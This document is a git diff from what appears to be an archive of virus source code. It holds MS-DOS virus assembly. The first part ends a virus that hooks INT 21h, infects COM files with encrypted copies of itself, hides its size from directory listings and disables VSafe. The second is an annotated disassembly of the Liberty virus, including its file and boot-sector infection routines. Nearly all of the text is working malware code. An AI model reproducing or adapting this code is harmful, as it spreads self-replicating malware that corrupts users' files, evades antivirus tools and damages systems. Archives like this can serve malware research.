+pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! +jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +ÿsub byte ptr [di],02h +not word ptr [di] +sub byte ptr [di],083h +xor byte ptr [di],0f8h +sub word ptr [di],0ecb8h +sub byte ptr [di],049h +dec word ptr [di] +sub word ptr [di],05875h +not word ptr [di] +xor byte ptr [di],0a2h +xor byte ptr [di],0ch +xor byte ptr [di],069h +xor word ptr [di],03c11h +not byte ptr [di] +add byte ptr [di],07ch +ÿinc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +ÿ;--------------------------------- +action: ;Call label +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; +mov AH,9 ;yeah!! +MOV DX,OFFSET PAO ;print my text! +INT 21H ;now! +INT 20H ;an finsh te program +NO_DAY: ;label to incorrect date +ret ;return from call +;--------------------------------- + +ÿ +PAO: +DB 10,13,'Dedicated to Liana. 20 May 96','$' + +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +ÿ;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... + int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +ÿaction_dia Db 014H ;day for the action +action_mes Db 05H ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.liberty2.asm b/MSDOS/Virus.MSDOS.Unknown.liberty2.asm new file mode 100644 index 00000000..ad39d293 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.liberty2.asm @@ -0,0 +1,1194 @@ +CS:0110 EB79 JMP 018B +CS:0112 90 NOP +; +; The program's original infomation is stored between these sections +; +CS:018B 2E CS: +CS:018C 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ? +CS:0191 7403 JZ 0196 +CS:0193 1F POP DS +CS:0194 59 POP CX +CS:0195 5B POP BX +CS:0196 50 PUSH AX +CS:0197 53 PUSH BX +CS:0198 51 PUSH CX +CS:0199 52 PUSH DX +CS:019A 1E PUSH DS +CS:019B 06 PUSH ES +CS:019C 1E PUSH DS +CS:019D 0E PUSH CS +CS:019E 1F POP DS +CS:019F E8CD00 CALL 026F ; Installation check +CS:01A2 3DFFFF CMP AX,FFFF +CS:01A5 741A JZ 01C1 +CS:01A7 E8D700 CALL 0281 ; Get vector 21h +CS:01AA 07 POP ES +CS:01AB 06 PUSH ES +CS:01AC 8CC0 MOV AX,ES +CS:01AE 48 DEC AX +CS:01AF 8ED8 MOV DS,AX +CS:01B1 E8DC00 CALL 0290 ; Adjust MCB +CS:01B4 8EC0 MOV ES,AX +CS:01B6 0E PUSH CS +CS:01B7 1F POP DS +CS:01B8 E8EC00 CALL 02A7 ; Move to Upper Memory +CS:01BB E8F400 CALL 02B2 ; Set vector 21h +CS:01BE E80101 CALL 02C2 ; Set installation flag +CS:01C1 2E CS: +CS:01C2 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ? +CS:01C7 7417 JZ 01E0 +CS:01C9 07 POP ES +CS:01CA 0E PUSH CS +CS:01CB 1F POP DS +CS:01CC E80901 CALL 02D8 ; Decrypt header +CS:01CF E81901 CALL 02EB ; Restore header +CS:01D2 07 POP ES +CS:01D3 1F POP DS +CS:01D4 5A POP DX +CS:01D5 59 POP CX +CS:01D6 5B POP BX +CS:01D7 58 POP AX +CS:01D8 1E PUSH DS +CS:01D9 BF0001 MOV DI,0100 +CS:01DC 57 PUSH DI +CS:01DD 33FF XOR DI,DI +CS:01DF CB RETF ; Start file +CS:01E0 FA CLI +CS:01E1 5E POP SI +CS:01E2 07 POP ES +CS:01E3 1F POP DS +CS:01E4 5A POP DX +CS:01E5 59 POP CX +CS:01E6 5B POP BX +CS:01E7 58 POP AX +CS:01E8 2E CS: +CS:01E9 8B3E2C06 MOV DI,[062C] +CS:01ED 03FE ADD DI,SI +CS:01EF 8ED7 MOV SS,DI +CS:01F1 2E CS: +CS:01F2 8B3E2E06 MOV DI,[062E] +CS:01F6 8BE7 MOV SP,DI ; Restore stack +CS:01F8 2E CS: +CS:01F9 8B3E2806 MOV DI,[0628] +CS:01FD 03FE ADD DI,SI +CS:01FF 57 PUSH DI +CS:0200 2E CS: +CS:0201 FF362A06 PUSH [062A] +CS:0205 33F6 XOR SI,SI +CS:0207 EBD4 JMP 01DD ; Start file +; +; The encrypted Liberty header for .COM files +; +DS:0200 1D 69 D9 00 01 01 +DS:0210 80 80 40 40 20 20 10 10-08 08 A4 05 D2 04 C9 02 +DS:0220 4C 81 A8 40 49 20 21 90-0B 48 E8 69 95 05 4A 92 +DS:0230 21 1D 40 A8 43 28 90 14-4E 4C 07 27 D3 22 81 81 +DS:0240 C0 B0 40 C4 79 20 90 29-5C D0 AE 69 57 35 2B 9A +DS:0250 31 CD 34 40 51 53 AE 5D-62 C0 E3 C1 B0 35 58 F6 +DS:0260 46 E5 20 02 +; +; Various subroutines used by the virus +; +CS:026F 2E CS: +CS:0270 8A1E6A02 MOV BL,[026A] +CS:0274 32FF XOR BH,BH +CS:0276 33C0 XOR AX,AX +CS:0278 8ED8 MOV DS,AX +CS:027A D1E3 SHL BX,1 +CS:027C D1E3 SHL BX,1 +CS:027E 8B07 MOV AX,[BX] +CS:0280 C3 RET +CS:0281 A18400 MOV AX,[0084] +CS:0284 2E CS: +CS:0285 A38C03 MOV [038C],AX +CS:0288 A18600 MOV AX,[0086] +CS:028B 2E CS: +CS:028C A38E03 MOV [038E],AX +CS:028F C3 RET +CS:0290 BB4221 MOV BX,2142 +CS:0293 B104 MOV CL,04 +CS:0295 D3EB SHR BX,CL +CS:0297 291E0300 SUB [0003],BX +CS:029B A10300 MOV AX,[0003] +CS:029E 03060100 ADD AX,[0001] +CS:02A2 A31200 MOV [0012],AX +CS:02A5 40 INC AX +CS:02A6 C3 RET +CS:02A7 BF1001 MOV DI,0110 +CS:02AA 8BF7 MOV SI,DI +CS:02AC B99A05 MOV CX,059A +CS:02AF F3 REPZ +CS:02B0 A5 MOVSW +CS:02B1 C3 RET +CS:02B2 33C0 XOR AX,AX +CS:02B4 8ED8 MOV DS,AX +CS:02B6 FA CLI +CS:02B7 B86C03 MOV AX,036C +CS:02BA A38400 MOV [0084],AX +CS:02BD 8C068600 MOV [0086],ES +CS:02C1 C3 RET +CS:02C2 FA CLI +CS:02C3 B8FFFF MOV AX,FFFF +CS:02C6 2E CS: +CS:02C7 8A1E6A02 MOV BL,[026A] +CS:02CB 32FF XOR BH,BH +CS:02CD D1E3 SHL BX,1 +CS:02CF D1E3 SHL BX,1 +CS:02D1 8907 MOV [BX],AX +CS:02D3 40 INC AX +CS:02D4 894702 MOV [BX+02],AX +CS:02D7 C3 RET +CS:02D8 B93C00 MOV CX,003C +CS:02DB BE1301 MOV SI,0113 +CS:02DE 2E CS: +CS:02DF 8B14 MOV DX,[SI] +CS:02E1 D3CA ROR DX,CL +CS:02E3 2E CS: +CS:02E4 8914 MOV [SI],DX +CS:02E6 46 INC SI +CS:02E7 46 INC SI +CS:02E8 E2F4 LOOP 02DE +CS:02EA C3 RET +CS:02EB BF0001 MOV DI,0100 +CS:02EE BE1301 MOV SI,0113 +CS:02F1 B93C00 MOV CX,003C +CS:02F4 F3 REPZ +CS:02F5 A5 MOVSW +CS:02F6 C3 RET +; +; I am not sure what the next routine is supposed to be doing. +; +CS:02F7 9C PUSHF +CS:02F8 2E CS: +CS:02F9 803E100301 CMP BYTE PTR [0310],01 +CS:02FE 740A JZ 030A +CS:0300 80FC03 CMP AH,03 +CS:0303 7505 JNZ 030A +CS:0305 80FA80 CMP DL,80 +CS:0308 7207 JB 0311 +CS:030A 9D POPF +CS:030B EA00000000 JMP 0000:0000 +CS:0311 06 PUSH ES +CS:0312 0E PUSH CS +CS:0313 07 POP ES +CS:0314 B80902 MOV AX,0209 +CS:0317 BB420C MOV BX,0C42 +CS:031A B90100 MOV CX,0001 +CS:031D 9C PUSHF +CS:031E 2E CS: +CS:031F FF1E0C03 CALL FAR [030C] +CS:0323 72E5 JB 030A +CS:0325 B80905 MOV AX,0509 +CS:0328 BB4803 MOV BX,0348 +CS:032B B93100 MOV CX,0031 +CS:032E 9C PUSHF +CS:032F 2E CS: +CS:0330 FF1E0C03 CALL FAR [030C] +CS:0334 72D4 JB 030A +CS:0336 B80903 MOV AX,0309 +CS:0339 BB420C MOV BX,0C42 +CS:033C B93100 MOV CX,0031 +CS:033F 9C PUSHF +CS:0340 2E CS: +CS:0341 FF1E0C03 CALL FAR [030C] +CS:0345 07 POP ES +CS:0346 9D POPF +CS:0347 CF IRET +; +; Another format table used by the virus +; +DS:0340 00 00 31 02 00 00 32 02 +DS:0350 00 00 33 02 00 00 34 02-00 00 35 02 00 00 36 02 +DS:0360 00 00 37 02 00 00 38 02-00 00 39 02 +; +; The virus infects files by monitoring function 4Bh of vector 21h +; +CS:036C 9C PUSHF +CS:036D 3D004B CMP AX,4B00 ; Execute function ? +CS:0370 741E JZ 0390 +CS:0372 EB16 JMP 038A +CS:0374 90 NOP +CS:0375 E8B901 CALL 0531 ; Close file +CS:0378 E89A00 CALL 0415 ; Restore vectors +CS:037B C6060C04FF MOV BYTE PTR [040C],FF +CS:0380 90 NOP +CS:0381 9D POPF +CS:0382 07 POP ES +CS:0383 1F POP DS +CS:0384 5F POP DI +CS:0385 5E POP SI +CS:0386 5A POP DX +CS:0387 59 POP CX +CS:0388 5B POP BX +CS:0389 58 POP AX +CS:038A 9D POPF +CS:038B EA77142C02 JMP 022C:1477 ; Continue +CS:0390 50 PUSH AX +CS:0391 53 PUSH BX +CS:0392 51 PUSH CX +CS:0393 52 PUSH DX +CS:0394 56 PUSH SI +CS:0395 57 PUSH DI +CS:0396 1E PUSH DS +CS:0397 06 PUSH ES +CS:0398 9C PUSHF +CS:0399 E8A600 CALL 0442 ; Set error vectors +CS:039C E8E100 CALL 0480 ; Open file +CS:039F 72D4 JB 0375 +CS:03A1 0E PUSH CS +CS:03A2 1F POP DS +CS:03A3 0E PUSH CS +CS:03A4 07 POP ES +CS:03A5 A30A04 MOV [040A],AX +CS:03A8 93 XCHG BX,AX +CS:03A9 C6060C0401 MOV BYTE PTR [040C],01 +CS:03AE 90 NOP +CS:03AF E8D800 CALL 048A ; Read file header +CS:03B2 72C1 JB 0375 +CS:03B4 BB1301 MOV BX,0113 +CS:03B7 2E CS: +CS:03B8 813F4D5A CMP WORD PTR [BX],5A4D ; .EXE file ? +CS:03BC 7505 JNZ 03C3 +CS:03BE E8C001 CALL 0581 ; Adapt header +CS:03C1 EBB2 JMP 0375 +CS:03C3 2E CS: +CS:03C4 C606090200 MOV BYTE PTR [0209],00 ; Set switch +CS:03C9 E8CD00 CALL 0499 ; Check infection +CS:03CC 74A7 JZ 0375 +CS:03CE E8DD00 CALL 04AE ; Encrypt header +CS:03D1 E8EB00 CALL 04BF ; Move to EOF +CS:03D4 729F JB 0375 +CS:03D6 83FA00 CMP DX,+00 ; +CS:03D9 759A JNZ 0375 ; +CS:03DB 3D0005 CMP AX,0500 ; +CS:03DE 7295 JB 0375 ; +CS:03E0 3DFFEF CMP AX,EFFF ; +CS:03E3 7390 JNB 0375 ; Check file size +CS:03E5 E8EA00 CALL 04D2 ; Move to next paragraph +CS:03E8 728B JB 0375 +CS:03EA E80701 CALL 04F4 ; Write virus +CS:03ED 7286 JB 0375 +CS:03EF 3BC1 CMP AX,CX +CS:03F1 7C11 JL 0404 +CS:03F3 E81301 CALL 0509 ; Move to BOF +CS:03F6 7209 JB 0401 +CS:03F8 E86201 CALL 055D ; Decrypt Libery header +CS:03FB E81E01 CALL 051C ; Write Liberty header +CS:03FE E86F01 CALL 0570 ; Encrypt Liberty Header +CS:0401 E971FF JMP 0375 +CS:0404 E83801 CALL 053F ; Set & get vector 13h +CS:0407 E96BFF JMP 0375 +; +; Revectoring of error vectors. +; +CS:0415 1E PUSH DS +CS:0416 33DB XOR BX,BX +CS:0418 8EDB MOV DS,BX +CS:041A FA CLI +CS:041B 2E CS: +CS:041C 8B1E0D04 MOV BX,[040D] +CS:0420 891E8C00 MOV [008C],BX +CS:0424 2E CS: +CS:0425 8B1E0F04 MOV BX,[040F] +CS:0429 891E8E00 MOV [008E],BX +CS:042D FA CLI +CS:042E 2E CS: +CS:042F 8B1E1104 MOV BX,[0411] +CS:0433 891E9000 MOV [0090],BX +CS:0437 2E CS: +CS:0438 8B1E1304 MOV BX,[0413] +CS:043C 891E8E00 MOV [008E],BX +CS:0440 1F POP DS +CS:0441 C3 RET +CS:0442 1E PUSH DS +CS:0443 33DB XOR BX,BX +CS:0445 8EDB MOV DS,BX +CS:0447 8B1E8C00 MOV BX,[008C] +CS:044B 2E CS: +CS:044C 891E0D04 MOV [040D],BX +CS:0450 8B1E8E00 MOV BX,[008E] +CS:0454 2E CS: +CS:0455 891E0F04 MOV [040F],BX +CS:0459 FA CLI +CS:045A BB3106 MOV BX,0631 +CS:045D 891E8C00 MOV [008C],BX +CS:0461 8C0E8E00 MOV [008E],CS +CS:0465 8B1E9000 MOV BX,[0090] +CS:0469 2E CS: +CS:046A 891E1104 MOV [0411],BX +CS:046E 8B1E9200 MOV BX,[0092] +CS:0472 FA CLI +CS:0473 BB3206 MOV BX,0632 +CS:0476 891E9000 MOV [0090],BX +CS:047A 8C0E9200 MOV [0092],CS +CS:047E 1F POP DS +CS:047F C3 RET +; +; Various subroutines used by the virus +; +CS:0480 B8023D MOV AX,3D02 +CS:0483 9C PUSHF +CS:0484 2E CS: +CS:0485 FF1E8C03 CALL FAR [038C] +CS:0489 C3 RET +CS:048A B43F MOV AH,3F +CS:048C B97800 MOV CX,0078 +CS:048F BA1301 MOV DX,0113 +CS:0492 9C PUSHF +CS:0493 2E CS: +CS:0494 FF1E8C03 CALL FAR [038C] +CS:0498 C3 RET +CS:0499 BF1301 MOV DI,0113 +CS:049C 81C76802 ADD DI,0268 +CS:04A0 81EF0A02 SUB DI,020A +CS:04A4 BE6802 MOV SI,0268 +CS:04A7 FC CLD +CS:04A8 B90700 MOV CX,0007 +CS:04AB F3 REPZ +CS:04AC A6 CMPSB +CS:04AD C3 RET +CS:04AE B93C00 MOV CX,003C +CS:04B1 BE1301 MOV SI,0113 +CS:04B4 8B14 MOV DX,[SI] +CS:04B6 D3C2 ROL DX,CL +CS:04B8 8914 MOV [SI],DX +CS:04BA 46 INC SI +CS:04BB 46 INC SI +CS:04BC E2F6 LOOP 04B4 +CS:04BE C3 RET +CS:04BF B80242 MOV AX,4202 +CS:04C2 2E CS: +CS:04C3 8B1E0A04 MOV BX,[040A] +CS:04C7 33C9 XOR CX,CX +CS:04C9 33D2 XOR DX,DX +CS:04CB 9C PUSHF +CS:04CC 2E CS: +CS:04CD FF1E8C03 CALL FAR [038C] +CS:04D1 C3 RET +CS:04D2 B90400 MOV CX,0004 +CS:04D5 D3E8 SHR AX,CL +CS:04D7 BB6602 MOV BX,0266 +CS:04DA 8907 MOV [BX],AX +CS:04DC 40 INC AX +CS:04DD B90400 MOV CX,0004 +CS:04E0 D3E0 SHL AX,CL +CS:04E2 92 XCHG DX,AX +CS:04E3 33C9 XOR CX,CX +CS:04E5 B80042 MOV AX,4200 +CS:04E8 2E CS: +CS:04E9 8B1E0A04 MOV BX,[040A] +CS:04ED 9C PUSHF +CS:04EE 2E CS: +CS:04EF FF1E8C03 CALL FAR [038C] +CS:04F3 C3 RET +CS:04F4 B9330B MOV CX,0B33 +CS:04F7 B80040 MOV AX,4000 +CS:04FA BA1001 MOV DX,0110 +CS:04FD 2E CS: +CS:04FE 8B1E0A04 MOV BX,[040A] +CS:0502 9C PUSHF +CS:0503 2E CS: +CS:0504 FF1E8C03 CALL FAR [038C] +CS:0508 C3 RET +CS:0509 B80042 MOV AX,4200 +CS:050C 2E CS: +CS:050D 8B1E0A04 MOV BX,[040A] +CS:0511 33C9 XOR CX,CX +CS:0513 33D2 XOR DX,DX +CS:0515 9C PUSHF +CS:0516 2E CS: +CS:0517 FF1E8C03 CALL FAR [038C] +CS:051B C3 RET +CS:051C BA0A02 MOV DX,020A +CS:051F B80040 MOV AX,4000 +CS:0522 2E CS: +CS:0523 8B1E0A04 MOV BX,[040A] +CS:0527 B97800 MOV CX,0078 +CS:052A 9C PUSHF +CS:052B 2E CS: +CS:052C FF1E8C03 CALL FAR [038C] +CS:0530 C3 RET +CS:0531 B43E MOV AH,3E +CS:0533 2E CS: +CS:0534 8B1E0A04 MOV BX,[040A] +CS:0538 9C PUSHF +CS:0539 2E CS: +CS:053A FF1E8C03 CALL FAR [038C] +CS:053E C3 RET +CS:053F 33C0 XOR AX,AX +CS:0541 8ED8 MOV DS,AX +CS:0543 FA CLI +CS:0544 A14C00 MOV AX,[004C] +CS:0547 2E CS: +CS:0548 A31407 MOV [0714],AX +CS:054B A14E00 MOV AX,[004E] +CS:054E 2E CS: +CS:054F A31607 MOV [0716],AX +CS:0552 B8F906 MOV AX,06F9 +CS:0555 A34C00 MOV [004C],AX +CS:0558 8C0E4E00 MOV [004E],CS +CS:055C C3 RET +; +; Header encrypting +; +CS:055D B92D00 MOV CX,002D +CS:0560 BE0A02 MOV SI,020A +CS:0563 2E CS: +CS:0564 8B3C MOV DI,[SI] +CS:0566 D3CF ROR DI,CL +CS:0568 2E CS: +CS:0569 893C MOV [SI],DI +CS:056B 46 INC SI +CS:056C 46 INC SI +CS:056D E2F4 LOOP 0563 +CS:056F C3 RET +CS:0570 BE0A02 MOV SI,020A +CS:0573 B92D00 MOV CX,002D +CS:0576 8B3C MOV DI,[SI] +CS:0578 D3C7 ROL DI,CL +CS:057A 893C MOV [SI],DI +CS:057C 46 INC SI +CS:057D 46 INC SI +CS:057E E2F6 LOOP 0576 +CS:0580 C3 RET +; +; .EXE file handling +; +CS:0581 8B7F02 MOV DI,[BX+02] +CS:0584 83FFFF CMP DI,-01 ; Check infection +CS:0587 7439 JZ 05C2 +CS:0589 8B7F16 MOV DI,[BX+16] +CS:058C 83C710 ADD DI,+10 +CS:058F 893E2806 MOV [0628],DI +CS:0593 8B7F14 MOV DI,[BX+14] +CS:0596 893E2A06 MOV [062A],DI +CS:059A 8B7F0E MOV DI,[BX+0E] +CS:059D 83C710 ADD DI,+10 +CS:05A0 893E2C06 MOV [062C],DI +CS:05A4 8B7F10 MOV DI,[BX+10] +CS:05A7 893E2E06 MOV [062E],DI +CS:05AB BF1001 MOV DI,0110 +CS:05AE 897F14 MOV [BX+14],DI ; Set IP +CS:05B1 BF420D MOV DI,0D42 +CS:05B4 897F10 MOV [BX+10],DI ; Set SP +CS:05B7 2E CS: +CS:05B8 C606090201 MOV BYTE PTR [0209],01 ; Set switch +CS:05BD E8FFFE CALL 04BF ; Move to EOF +CS:05C0 7301 JNB 05C3 +CS:05C2 C3 RET +CS:05C3 83FA0A CMP DX,+0A ; +CS:05C6 77FA JA 05C2 ; Check file size +CS:05C8 B104 MOV CL,04 +CS:05CA D3E8 SHR AX,CL +CS:05CC 40 INC AX +CS:05CD 3D0010 CMP AX,1000 +CS:05D0 7501 JNZ 05D3 +CS:05D2 42 INC DX +CS:05D3 D3E0 SHL AX,CL +CS:05D5 50 PUSH AX +CS:05D6 52 PUSH DX +CS:05D7 B91000 MOV CX,0010 +CS:05DA F7F1 DIV CX +CS:05DC BB1301 MOV BX,0113 +CS:05DF 2D1100 SUB AX,0011 +CS:05E2 8B7F08 MOV DI,[BX+08] +CS:05E5 2BC7 SUB AX,DI +CS:05E7 894716 MOV [BX+16],AX ; Set CodeSegment +CS:05EA 89470E MOV [BX+0E],AX ; Set StackSegment +CS:05ED 59 POP CX +CS:05EE 5A POP DX +CS:05EF E8F3FE CALL 04E5 ; Move to next paragraph +CS:05F2 722F JB 0623 +CS:05F4 E8FDFE CALL 04F4 ; Write virus +CS:05F7 722A JB 0623 +CS:05F9 3BC1 CMP AX,CX +CS:05FB 7C27 JL 0624 +CS:05FD E8BFFE CALL 04BF ; Move to BOF +CS:0600 7221 JB 0623 +CS:0602 B90002 MOV CX,0200 +CS:0605 F7F1 DIV CX +CS:0607 83FA00 CMP DX,+00 +CS:060A 7401 JZ 060D +CS:060C 40 INC AX +CS:060D BB1301 MOV BX,0113 +CS:0610 894704 MOV [BX+04],AX ; Set blocks +CS:0613 C74702FFFF MOV WORD PTR [BX+02],FFFF ; Set infection mark +CS:0618 E8EEFE CALL 0509 ; Move to BOF +CS:061B 7206 JB 0623 +CS:061D BA1301 MOV DX,0113 +CS:0620 E8FCFE CALL 051F ; Write header +CS:0623 C3 RET +CS:0624 E818FF CALL 053F ; Set & get vector 13h +CS:0627 C3 RET +; +; Error vectors +; +CS:0631 CF IRET ; Error vector 23h +CS:0632 32C0 XOR AL,AL ; +CS:0634 CF IRET ; Error vector 24h +; +; The next part is the virus's bootsector +; +CS:0635 EB01 JMP 0638 +CS:0637 90 NOP +CS:0638 33C0 XOR AX,AX +CS:063A 8ED0 MOV SS,AX +CS:063C BC007C MOV SP,7C00 +CS:063F 33C0 XOR AX,AX +CS:0641 8EC0 MOV ES,AX +CS:0643 BB1304 MOV BX,0413 ; +CS:0646 26 ES: ; +CS:0647 8B07 MOV AX,[BX] ; +CS:0649 2D0A00 SUB AX,000A ; +CS:064C B106 MOV CL,06 ; +CS:064E 26 ES: ; +CS:064F 8907 MOV [BX],AX ; Decrease memory +CS:0651 D3E0 SHL AX,CL +CS:0653 8EC0 MOV ES,AX +CS:0655 B80802 MOV AX,0208 ; +CS:0658 BB1001 MOV BX,0110 ; +CS:065B B93128 MOV CX,2831 ; +CS:065E 33D2 XOR DX,DX ; +CS:0660 CD13 INT 13 ; Read virus +CS:0662 06 PUSH ES +CS:0663 BB6806 MOV BX,0668 +CS:0666 53 PUSH BX +CS:0667 CB RETF +CS:0668 2E CS: +CS:0669 803EC8060A CMP BYTE PTR [06C8],0A +CS:066E 7446 JZ 06B6 +CS:0670 33C0 XOR AX,AX +CS:0672 8ED8 MOV DS,AX +CS:0674 2E CS: +CS:0675 FE06C806 INC BYTE PTR [06C8] +CS:0679 B80803 MOV AX,0308 +CS:067C BB1001 MOV BX,0110 +CS:067F B93128 MOV CX,2831 +CS:0682 33D2 XOR DX,DX +CS:0684 CD13 INT 13 +CS:0686 E85200 CALL 06DB ; Set & get vector 13h +CS:0689 2E CS: ; +CS:068A C606470BFF MOV BYTE PTR [0B47],FF ; +CS:068F 90 NOP ; +CS:0690 2E CS: ; +CS:0691 C606950BFF MOV BYTE PTR [0B95],FF ; +CS:0696 90 NOP ; +CS:0697 2E CS: ; +CS:0698 C606080CFF MOV BYTE PTR [0C08],FF ; Switches off +CS:069D 90 NOP +CS:069E E82902 CALL 08CA ; Set & get vector 8h +CS:06A1 E85402 CALL 08F8 ; Set & get vector 1Ch +CS:06A4 E84104 CALL 0AE8 ; Set & get vector 10h +CS:06A7 E85804 CALL 0B02 ; Set & get vector 14h +CS:06AA E86F04 CALL 0B1C ; Set & get vector 17h +CS:06AD E81900 CALL 06C9 ; Read original bootsector +CS:06B0 BB007C MOV BX,7C00 ; +CS:06B3 1E PUSH DS ; +CS:06B4 53 PUSH BX ; +CS:06B5 CB RETF ; Start +CS:06B6 E81000 CALL 06C9 ; Read bootsector +CS:06B9 B80103 MOV AX,0301 +CS:06BC BB007C MOV BX,7C00 +CS:06BF B90100 MOV CX,0001 +CS:06C2 33D2 XOR DX,DX +CS:06C4 CD13 INT 13 +CS:06C6 EBE5 JMP 06AD +CS:06C9 33C0 XOR AX,AX +CS:06CB 8EC0 MOV ES,AX +CS:06CD B80102 MOV AX,0201 +CS:06D0 BB007C MOV BX,7C00 +CS:06D3 B93F28 MOV CX,283F +CS:06D6 33D2 XOR DX,DX +CS:06D8 CD13 INT 13 +CS:06DA C3 RET +CS:06DB 33C0 XOR AX,AX +CS:06DD 8ED8 MOV DS,AX +CS:06DF A14C00 MOV AX,[004C] +CS:06E2 2E CS: +CS:06E3 A31608 MOV [0816],AX +CS:06E6 A14E00 MOV AX,[004E] +CS:06E9 2E CS: +CS:06EA A31808 MOV [0818],AX +CS:06ED FA CLI +CS:06EE B8FB07 MOV AX,07FB +CS:06F1 A34C00 MOV [004C],AX +CS:06F4 8C0E4E00 MOV [004E],CS +CS:06F8 C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:06F9 9C PUSHF +CS:06FA 80FC01 CMP AH,01 +CS:06FD 7E13 JLE 0712 +CS:06FF 80FC04 CMP AH,04 +CS:0702 7D0E JGE 0712 +CS:0704 80FA80 CMP DL,80 +CS:0707 720F JB 0718 +CS:0709 E8BE00 CALL 07CA ; Disconnect 